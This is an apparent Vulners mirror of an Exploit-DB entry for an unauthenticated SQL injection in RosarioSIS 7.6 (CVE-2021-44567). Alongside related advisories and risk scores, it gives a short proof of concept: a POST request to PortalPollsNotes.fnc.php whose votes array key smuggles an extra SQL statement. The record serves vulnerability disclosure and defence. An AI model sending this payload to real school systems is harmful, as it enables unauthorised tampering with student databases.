Lucene search
K

RosarioSIS 7.6 - SQL Injection

🗓️ 11 Apr 2025 00:00:00Reported by CodeSecLabType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 228 Views

RosarioSIS 7.6.1 has an unauthenticated SQL injection vulnerability in PortalPollsNotes.fnc.php.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-44567
24 Feb 202218:21
circl
CNNVD
RosarioSis SQL注入漏洞
24 Feb 202200:00
cnnvd
CVE
CVE-2021-44567
22 Feb 202220:16
cve
Cvelist
CVE-2021-44567
22 Feb 202220:16
cvelist
EUVD
EUVD-2022-0900
3 Oct 202520:07
euvd
Github Security Blog
SQL injection in francoisjacquet/rosariosis
25 Feb 202200:01
github
NVD
CVE-2021-44567
24 Feb 202215:15
nvd
OSV
GHSA-82RR-MQ4R-P4R3 SQL injection in francoisjacquet/rosariosis
25 Feb 202200:01
osv
Packet Storm
📄 RosarioSIS SQL Injection
11 Apr 202500:00
packetstorm
Prion
Sql injection
24 Feb 202215:15
prion
Rows per page
# Exploit Title: RosarioSIS 7.6 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 7.6
# Tested on: Ubuntu Windows
# CVE : CVE-2021-44567

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 

votes['; CREATE TABLE aaa(t text) --]=1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.12478
228